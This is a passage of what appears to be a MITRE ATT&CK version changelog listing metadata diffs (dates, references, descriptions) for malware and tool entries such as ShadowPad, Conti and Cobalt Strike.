t1[S-Type](https://attack.mitre.org/software/S0085) is a backdt1[S-Type](https://attack.mitre.org/software/S0085) is a backd
>oor that was used by [Dust Storm](https://attack.mitre.org/g>oor that was used in [Operation Dust Storm](https://attack.m
>roups/G0031) from 2013 to 2014. (Citation: Cylance Dust Stor>itre.org/campaigns/C0016since at least 2013.(Citation: Cyl
>m)>ance Dust Storm)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 18:28:45.114000+00:002022-09-30 20:10:08.347000+00:00
description[S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2013 to 2014. (Citation: Cylance Dust Storm)[S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2013.(Citation: Cylance Dust Storm)
external_references[1]['description']Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.
external_references[1]['url']https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdfhttps://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf
x_mitre_version1.11.2

[S0461] SDBbot

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-03-29 20:35:47.468000+00:002022-07-18 16:01:14.539000+00:00
external_references[1]['source_name']Proofpoint TA505 October 2019IBM TA505 April 2020
external_references[1]['description']Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.
external_references[1]['url']https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloaderhttps://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/
external_references[2]['source_name']IBM TA505 April 2020Proofpoint TA505 October 2019
external_references[2]['description']Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.
external_references[2]['url']https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader
x_mitre_version2.02.1

[S0649] SMOKEDHAM

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 20:12:16.269000+00:002022-10-18 22:07:23.251000+00:00
external_references[2]['source_name']FireEye Shining A Light on DARKSIDE May 2021FireEye SMOKEDHAM June 2021
external_references[2]['description']FireEye. (2021, May 11). Shining a Light on DARKSIDE Ransomware Operations. Retrieved September 22, 2021.FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.htmlhttps://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html
external_references[3]['source_name']FireEye SMOKEDHAM June 2021FireEye Shining A Light on DARKSIDE May 2021
external_references[3]['description']FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.FireEye. (2021, May 11). Shining a Light on DARKSIDE Ransomware Operations. Retrieved September 22, 2021.
external_references[3]['url']https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.htmlhttps://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html
x_mitre_version1.01.1

[S0464] SYSCON

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-06-15 15:17:10.012000+00:002022-10-21 15:16:57.038000+00:00
x_mitre_version1.01.1

[S0596] ShadowPad

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 13:14:35.741000+00:002022-10-17 19:31:36.083000+00:00
external_references[2]['source_name']Recorded Future RedEcho Feb 2021FireEye APT41 Aug 2019
external_references[2]['description']Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021.Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.
external_references[2]['url']https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdfhttps://content.fireeye.com/apt-41/rpt-apt41
external_references[4]['source_name']Kaspersky ShadowPad Aug 2017Recorded Future RedEcho Feb 2021
external_references[4]['description']Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021.Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021.
external_references[4]['url']https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdfhttps://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf
external_references[5]['source_name']FireEye APT41 Aug 2019Kaspersky ShadowPad Aug 2017
external_references[5]['description']Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021.
external_references[5]['url']https://content.fireeye.com/apt-41/rpt-apt41https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdf
x_mitre_version1.01.1

[S0096] Systeminfo

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_platforms['Windows']
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-10-12 21:29:48.567000+00:00
x_mitre_version1.01.1
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_aliasessysteminfo.exe

[S0057] Tasklist

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_platforms['Windows']
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-10-12 21:30:23.536000+00:00
x_mitre_version1.01.1

[S0595] ThiefQuest

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-05 01:47:00.880000+00:002022-04-16 15:01:37.957000+00:00
external_references[2]['source_name']MacRansom.KEvilQuest
external_references[2]['description'](Citation: SentinelOne EvilQuest Ransomware Spyware 2020)(Citation: Reed thiefquest fake ransom)
external_references[3]['source_name']EvilQuestMacRansom.K
external_references[3]['description'](Citation: Reed thiefquest fake ransom)(Citation: SentinelOne EvilQuest Ransomware Spyware 2020)
external_references[4]['source_name']Reed thiefquest fake ransomwardle evilquest partii
external_references[4]['description']Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 18, 2021.Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021.
external_references[4]['url']https://blog.malwarebytes.com/detections/osx-thiefquest/https://objective-see.com/blog/blog_0x60.html
external_references[5]['source_name']wardle evilquest partiiSentinelOne EvilQuest Ransomware Spyware 2020
external_references[5]['description']Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021.Phil Stokes. (2020, July 8). “EvilQuest” Rolls Ransomware, Spyware & Data Theft Into One. Retrieved April 1, 2021.
external_references[5]['url']https://objective-see.com/blog/blog_0x60.htmlhttps://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/
external_references[6]['source_name']reed thiefquest ransomware analysisReed thiefquest fake ransom
external_references[6]['description']Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021.Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 18, 2021.
external_references[6]['url']https://blog.malwarebytes.com/mac/2020/07/mac-thiefquest-malware-may-not-be-ransomware-after-all/https://blog.malwarebytes.com/detections/osx-thiefquest/
external_references[7]['source_name']SentinelOne EvilQuest Ransomware Spyware 2020reed thiefquest ransomware analysis
external_references[7]['description']Phil Stokes. (2020, July 8). “EvilQuest” Rolls Ransomware, Spyware & Data Theft Into One. Retrieved April 1, 2021.Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021.
external_references[7]['url']https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/https://blog.malwarebytes.com/mac/2020/07/mac-thiefquest-malware-may-not-be-ransomware-after-all/
x_mitre_version1.11.2

[S0183] Tor

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-05-13 22:59:15.727000+00:002022-10-05 16:37:49.999000+00:00
x_mitre_version1.11.2

[S0136] USBStealer

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1[USBStealer](https://attack.mitre.org/software/S0136) is malt1[USBStealer](https://attack.mitre.org/software/S0136) is mal
>ware that has used by [APT28](https://attack.mitre.org/group>ware that has been used by [APT28](https://attack.mitre.org/
>s/G0007) since at least 2005 to extract information from air>groups/G0007) since at least 2005 to extract information fro
>-gapped networks. It does not have the capability to communi>m air-gapped networks. It does not have the capability to co
>cate over the Internet and has been used in conjunction with>mmunicate over the Internet and has been used in conjunction
> [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (> with [ADVSTORESHELL](https://attack.mitre.org/software/S004
>Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky >5). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspe
>Sofacy)>rsky Sofacy)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-18 16:11:07.955000+00:002022-04-19 22:53:27.639000+00:00
description[USBStealer](https://attack.mitre.org/software/S0136) is malware that has used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy)[USBStealer](https://attack.mitre.org/software/S0136) is malware that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy)
x_mitre_version1.11.2

[S0579] Waterbear

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-24 20:33:05.198000+00:002022-03-25 16:46:35.932000+00:00
x_mitre_version1.01.1

[S0645] Wevtutil

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-09-21 18:03:13.205000+00:002022-10-13 17:45:16.377000+00:00
x_mitre_version1.01.1

[S0086] ZLib

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1[ZLib](https://attack.mitre.org/software/S0086) is a full-fet1[ZLib](https://attack.mitre.org/software/S0086) is a full-fe
>atured backdoor that was used as a second-stage implant by [>atured backdoor that was used as a second-stage implant duri
>Dust Storm](https://attack.mitre.org/groups/G0031) from 2014>ng [Operation Dust Storm](https://attack.mitre.org/campaigns
> to 2015. It is malware and should not be confused with the >/C0016) since at least 2014. [ZLib](https://attack.mitre.org
>compression library from which its name is derived. (Citatio>/software/S0086) is malware and should not be confused with 
>n: Cylance Dust Storm)>the legitimate compression library from which its name is de
 >rived.(Citation: Cylance Dust Storm)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 02:44:21.378000+00:002022-09-30 20:52:00.462000+00:00
description[ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2014 to 2015. It is malware and should not be confused with the compression library from which its name is derived. (Citation: Cylance Dust Storm)[ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant during [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2014. [ZLib](https://attack.mitre.org/software/S0086) is malware and should not be confused with the legitimate compression library from which its name is derived.(Citation: Cylance Dust Storm)
external_references[1]['description']Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.
external_references[1]['url']https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdfhttps://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf
x_mitre_version1.11.2

[S0412] ZxShell

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1[ZxShell](https://attack.mitre.org/software/S0412) is a remot1[ZxShell](https://attack.mitre.org/software/S0412) is a remo
>te administration tool and backdoor that can be downloaded f>te administration tool and backdoor that can be downloaded f
>rom the Internet, particularly from Chinese hacker websites.>rom the Internet, particularly from Chinese hacker websites.
> It has been used since at least 2004.(Citation: FireEye APT> It has been used since at least 2004.(Citation: FireEye APT
>41 Aug 2019)(Citation: Talos ZxShell Oct 2014 )>41 Aug 2019)(Citation: Talos ZxShell Oct 2014)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:32:58.702000+00:002022-04-15 15:01:42.835000+00:00
description[ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 )[ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014)
external_references[1]['description'](Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 )(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014)
external_references[2]['description'](Citation: Talos ZxShell Oct 2014 )(Citation: Talos ZxShell Oct 2014)
external_references[3]['source_name']FireEye APT41 Aug 2019Talos ZxShell Oct 2014
external_references[3]['description']Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.
external_references[3]['url']https://content.fireeye.com/apt-41/rpt-apt41https://blogs.cisco.com/security/talos/opening-zxshell
external_references[4]['source_name']Talos ZxShell Oct 2014 FireEye APT41 Aug 2019
external_references[4]['description']Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.
external_references[4]['url']https://blogs.cisco.com/security/talos/opening-zxshellhttps://content.fireeye.com/apt-41/rpt-apt41
x_mitre_version1.11.2

[S0106] cmd

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 18:38:23.242000+00:002022-10-13 20:24:11.194000+00:00
external_references[2]['source_name']TechNet DirTechNet Copy
external_references[2]['description']Microsoft. (n.d.). Dir. Retrieved April 18, 2016.Microsoft. (n.d.). Copy. Retrieved April 26, 2016.
external_references[2]['url']https://technet.microsoft.com/en-us/library/cc755121.aspxhttps://technet.microsoft.com/en-us/library/bb490886.aspx
external_references[4]['source_name']TechNet CopyTechNet Dir
external_references[4]['description']Microsoft. (n.d.). Copy. Retrieved April 26, 2016.Microsoft. (n.d.). Dir. Retrieved April 18, 2016.
external_references[4]['url']https://technet.microsoft.com/en-us/library/bb490886.aspxhttps://technet.microsoft.com/en-us/library/cc755121.aspx
x_mitre_version1.11.2

[S0105] dsquery

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-18 20:01:55.739000+00:002022-10-13 13:34:53.355000+00:00
x_mitre_version1.21.3

[S0008] gsecdump

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:35:48.851000+00:002022-09-22 20:55:32.937000+00:00
x_mitre_version1.11.2

[S0100] ipconfig

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_platforms['Windows']
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-10-12 21:28:49.335000+00:00
x_mitre_version1.01.1
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_aliasesipconfig.exe

[S0104] netstat

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_platforms['Windows', 'Linux', 'macOS']
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-10-12 21:29:16.407000+00:00
x_mitre_version1.01.1
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_aliasesnetstat.exe

[S0103] route

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['route', 'route.exe']
x_mitre_platforms['Linux', 'Windows', 'macOS']
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-06 15:27:00.668000+00:00
x_mitre_version1.01.1

[S0111] schtasks

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-31 12:42:36.620000+00:002022-04-20 20:04:22.896000+00:00
x_mitre_version1.11.2
Other Version Changes

[S0521] BloodHound

Current version: 1.3

Version changed from: 1.1 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 23:23:19.517000+00:002022-09-27 18:19:01.118000+00:00
external_references[1]['source_name']GitHub BloodhoundFoxIT Wocao December 2019
external_references[1]['description']Robbins, A., Vazarkar, R., and Schroeder, W. (2016, April 17). Bloodhound: Six Degrees of Domain Admin. Retrieved March 5, 2019.Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020.
external_references[1]['url']https://github.com/BloodHoundAD/BloodHoundhttps://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
external_references[3]['source_name']FoxIT Wocao December 2019GitHub Bloodhound
external_references[3]['description']Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020.Robbins, A., Vazarkar, R., and Schroeder, W. (2016, April 17). Bloodhound: Six Degrees of Domain Admin. Retrieved March 5, 2019.
external_references[3]['url']https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdfhttps://github.com/BloodHoundAD/BloodHound
x_mitre_version1.11.3

[S0154] Cobalt Strike

Current version: 1.9

Version changed from: 1.7 → 1.9

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 20:08:21.958000+00:002022-10-12 23:24:12.980000+00:00
external_references[1]['url']https://cobaltstrike.com/downloads/csmanual38.pdfhttps://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf
x_mitre_version1.71.9

[S0575] Conti

Current version: 2.1

Version changed from: 1.1 → 2.1


Old Description
New Description
t1[Conti](https://attack.mitre.org/software/S0575) is a Ransomt1[Conti](https://attack.mitre.org/software/S0575) is a Ransom
>ware-as-a-Service that was first observed in December 2019, >ware-as-a-Service (RaaS) that was first observed in December
>and has being distributed via [TrickBot](https://attack.mitr> 2019. [Conti](https://attack.mitre.org/software/S0575) has 
>e.org/software/S0266). It has been used against major corpor>been deployed via [TrickBot](https://attack.mitre.org/softwa
>ations and government agencies, particularly those in North >re/S0266) and used against major corporations and government
>America. As with other ransomware families, actors using [Co> agencies, particularly those in North America. As with othe
>nti](https://attack.mitre.org/software/S0575) steal sensitiv>r ransomware families, actors using [Conti](https://attack.m
>e files and information from compromised networks, and threa>itre.org/software/S0575) steal sensitive files and informati
>ten to publish this data unless the ransom is paid.(Citation>on from compromised networks, and threaten to publish this d
>: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti Jul>ata unless the ransom is paid.(Citation: Cybereason Conti Ja
>y 2020)(Citation: Cybleinc Conti January 2020)>n 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cyb
 >leinc Conti January 2020)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-06-21 21:05:27.228000+00:002022-09-29 16:45:13.038000+00:00
description[Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service that was first observed in December 2019, and has being distributed via [TrickBot](https://attack.mitre.org/software/S0266). It has been used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020)[Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. [Conti](https://attack.mitre.org/software/S0575) has been deployed via [TrickBot](https://attack.mitre.org/software/S0266) and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020)
external_references[2]['source_name']Cybereason Conti Jan 2021CarbonBlack Conti July 2020
external_references[2]['description']Rochberger, L. (2021, January 12). Cybereason vs. Conti Ransomware. Retrieved February 17, 2021.Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021.
external_references[2]['url']https://www.cybereason.com/blog/cybereason-vs.-conti-ransomwarehttps://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/
external_references[3]['source_name']CarbonBlack Conti July 2020Cybleinc Conti January 2020
external_references[3]['description']Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021.Cybleinc. (2021, January 21). Conti Ransomware Resurfaces, Targeting Government & Large Organizations. Retrieved April 13, 2021.
external_references[3]['url']https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/https://cybleinc.com/2021/01/21/conti-ransomware-resurfaces-targeting-government-large-organizations/
external_references[4]['source_name']Cybleinc Conti January 2020Cybereason Conti Jan 2021
external_references[4]['description']Cybleinc. (2021, January 21). Conti Ransomware Resurfaces, Targeting Government & Large Organizations. Retrieved April 13, 2021.Rochberger, L. (2021, January 12). Cybereason vs. Conti Ransomware. Retrieved February 17, 2021.
external_references[4]['url']https://cybleinc.com/2021/01/21/conti-ransomware-resurfaces-targeting-government-large-organizations/https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware
x_mitre_version1.12.1

[S0363] Empire

Current version: 1.5

Version changed from: 1.3 → 1.5

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-08-11 14:58:57.587000+00:002022-06-03 17:55:43.889000+00:00
